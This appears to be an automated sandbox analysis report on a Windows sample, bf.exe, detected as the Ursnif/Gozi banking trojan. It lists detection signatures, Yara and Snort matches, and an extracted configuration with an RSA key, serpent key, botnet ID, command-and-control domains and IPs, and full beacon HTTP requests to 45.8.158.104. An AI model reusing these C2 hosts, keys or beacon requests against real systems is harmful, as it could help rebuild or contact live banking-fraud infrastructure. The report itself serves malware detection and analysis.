Windows Analysis Report
bf.exe

Overview

General Information

Sample Name: bf.exe
Analysis ID: 722154
MD5: b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1: 12b28a42e960dfc522348eba37b00ea74a0df527
SHA256: bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags: exegozi
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: bf.exe Virustotal: Detection: 76% Perma Link
Antivirus / Scanner detection for submitted sample
Source: bf.exe Avira: detected
Machine Learning detection for sample
Source: bf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.bf.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: bf.exe Malware Configuration Extractor: Ursnif {"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Uses 32bit PE files
Source: bf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49696 -> 45.8.158.104:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49696 -> 45.8.158.104:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASBAXETNRU ASBAXETNRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.8.158.104 45.8.158.104
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.158.104
Source: bf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsofU
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/
Source: explorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
Source: global traffic HTTP traffic detected: GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
